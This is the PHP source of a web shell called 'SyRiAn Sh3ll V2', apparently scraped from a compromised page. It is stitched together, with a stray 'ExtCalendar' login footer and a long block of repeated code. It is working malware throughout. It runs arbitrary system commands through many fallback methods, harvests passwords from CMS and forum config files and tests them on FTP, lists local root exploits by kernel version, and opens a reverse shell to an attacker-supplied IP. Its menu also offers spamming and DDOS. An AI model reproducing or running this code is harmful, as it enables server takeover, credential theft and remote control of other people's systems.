";print"
$delmtxt
"; } function callfuncs($cmnd) { if (function_exists(shell_exec)) { $scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd); print $nscmd; } elseif(!function_exists(shell_exec)) { exec($cmnd,$ecmd); $ecmd = join("\n",$ecmd); $necmd=htmlspecialchars($ecmd); print $necmd; } elseif(!function_exists(exec)) { $pcmd = popen($cmnd,"r"); while (!feof($pcmd)) { $res = htmlspecialchars(fgetc($pcmd)); print $res; } pclose($pcmd); } elseif(!function_exists(popen)) { ob_start(); system($cmnd); $sret = ob_get_contents(); ob_clean(); print htmlspecialchars($sret); } elseif(!function_exists(system)) { ob_start(); passthru($cmnd); $pret = ob_get_contents(); ob_clean(); print htmlspecialchars($pret); } } function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } } function permcol($path) { if (is_writable($path)) { print ""; callperms($path); print ""; } elseif (!is_readable($path)&&!is_writable($path)) { print ""; callperms($path); print ""; } else { print "";callperms($path); } } function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect('127.0.0.1'); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } } function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; } function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '0ff'; } else { $openBaseDir = '0N'; } return $openBaseDir; } function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = '0ff'; } else { $safe_mode = '0N'; } return $safe_mode; } function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; } function Suicide() { unlink(currentFileName()); } function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; } function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = "On"; } else { $postgreSQL = "Off"; } return $postgreSQL; } function Oracle() { if(@function_exists('ocilogon')) { $oracle = "On"; } else { $oracle = "Off"; } return $oracle; } function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = "On"; } else { $msSQL = "Off"; } return $msSQL; } function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = "0N"; } else { $mysql = "0ff"; } return $mysql; } function Gzip() { if (function_exists('gzencode')) { $gzip = "ON"; } else { $gzip = "Off"; } return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = "ON"; } else { $mysqli = "Off"; } return $mysqli; } function MSQL() { if (function_exists('msql_connect')) { $mSql = " ON "; } else { $mSql = "Off"; } return $mSql; } function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = "ON"; } else { $SQlLite = "Off"; } return $SQlLite; } function RegisterGlobals() { if(ini_get('register_globals')) { $registerg="On"; } else { $registerg="Off"; } return $registerg; } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function Curl() { if(extension_loaded('curl')) { $curl = "On"; } else { $curl = "Off"; } return $curl; } function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; } function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo "[+] Update Has D0n3 ^_^"; } function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = "0ff"; } else { $mag="0N"; } return $mag; } function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = "NONE"; } return $disfun; } $uname= @php_uname(); function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; } function Logout() { print""; } if($_GET['id']== 'logout') { Logout(); } # ---------------------------------------# # CSS # #----------------------------------------# echo " SyRiAn Sh3ll ~ V2~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { echo ""; } # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user and $_POST[passwrd]==$pass) { print''; } else { if($_POST[usrname]) { print''; } echo '

SyRiAn Sh3ll
UserName :

Password :

'; exit; } } } # ---------------------------------------# # Operating System # #----------------------------------------# $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; # ---------------------------------------# # Server Dir # #----------------------------------------# if(empty($dir)) { $opsy = getenv('OS'); if(empty($opsy)) { $opsy = php_uname(); } if(empty($opsy)) { $opsy ="-"; $os = "Linux"; } else { if(eregi("^Windows",$opsy)) { $os = "Windows"; } else { $os = "Linux"; } } } if($os == "Linux") { $pwd = @Exe("pwd"); } elseif($os == "Windows") { $pwd = @Exe("cd");} if(empty($pwd)) { $pwd = getcwd(); } # ---------------------------------------# # Header # #----------------------------------------# $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V2

  [Main] [Scripts Hacking] [Spamming] [Bypass] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ". GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search] [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # SuiCide # #----------------------------------------# if($_GET['id'] == 100) { echo ""; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage' ) { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Change Directory
  Edit File
  Get File
  Server ShortCut
  CGI Perl
  Change Mode

  Back Connection

"; if($_POST['backConnectionSubmit']) { $ip = $_POST['yourip']; $port = $_POST['yourport']; @set_time_limit (0); $VERSION = "1.0"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("[-] WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("[-] Error Can't Connect !! "); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("[+] Connected Successfully With $ip:$port"); printit("[+] SyRiAn Sh3ll V2"); while (1) { if (feof($sock)) { printit("[-] ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("[-] ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } } echo "
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files
  Encryption
  Metasploit Connection
  Show Users
  Ports Scanner
  ACP Finder
  DDOS Attacker
  Config Finder
 Enter your username and password to login
Username
Password
  Remember me

Powered by ExtCalendar 2

";print"
$delmtxt
"; } function callfuncs($cmnd) { if (function_exists(shell_exec)) { $scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd); print $nscmd; } elseif(!function_exists(shell_exec)) { exec($cmnd,$ecmd); $ecmd = join("\n",$ecmd); $necmd=htmlspecialchars($ecmd); print $necmd; } elseif(!function_exists(exec)) { $pcmd = popen($cmnd,"r"); while (!feof($pcmd)) { $res = htmlspecialchars(fgetc($pcmd)); print $res; } pclose($pcmd); } elseif(!function_exists(popen)) { ob_start(); system($cmnd); $sret = ob_get_contents(); ob_clean(); print htmlspecialchars($sret); } elseif(!function_exists(system)) { ob_start(); passthru($cmnd); $pret = ob_get_contents(); ob_clean(); print htmlspecialchars($pret); } } function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } } function permcol($path) { if (is_writable($path)) { print ""; callperms($path); print ""; } elseif (!is_readable($path)&&!is_writable($path)) { print ""; callperms($path); print ""; } else { print "";callperms($path); } } function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect('127.0.0.1'); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } } function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; } function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '0ff'; } else { $openBaseDir = '0N'; } return $openBaseDir; } function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = '0ff'; } else { $safe_mode = '0N'; } return $safe_mode; } function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; } function Suicide() { unlink(currentFileName()); } function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; } function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = "On"; } else { $postgreSQL = "Off"; } return $postgreSQL; } function Oracle() { if(@function_exists('ocilogon')) { $oracle = "On"; } else { $oracle = "Off"; } return $oracle; } function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = "On"; } else { $msSQL = "Off"; } return $msSQL; } function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = "0N"; } else { $mysql = "0ff"; } return $mysql; } function Gzip() { if (function_exists('gzencode')) { $gzip = "ON"; } else { $gzip = "Off"; } return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = "ON"; } else { $mysqli = "Off"; } return $mysqli; } function MSQL() { if (function_exists('msql_connect')) { $mSql = " ON "; } else { $mSql = "Off"; } return $mSql; } function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = "ON"; } else { $SQlLite = "Off"; } return $SQlLite; } function RegisterGlobals() { if(ini_get('register_globals')) { $registerg="On"; } else { $registerg="Off"; } return $registerg; } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function Curl() { if(extension_loaded('curl')) { $curl = "On"; } else { $curl = "Off"; } return $curl; } function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; } function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo "[+] Update Has D0n3 ^_^"; } function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = "0ff"; } else { $mag="0N"; } return $mag; } function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = "NONE"; } return $disfun; } $uname= @php_uname(); function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; } function Logout() { print""; } if($_GET['id']== 'logout') { Logout(); } # ---------------------------------------# # CSS # #----------------------------------------# echo " SyRiAn Sh3ll ~ V2~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { echo ""; } # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user and $_POST[passwrd]==$pass) { print''; } else { if($_POST[usrname]) { print''; } echo '

SyRiAn Sh3ll
UserName :

Password :

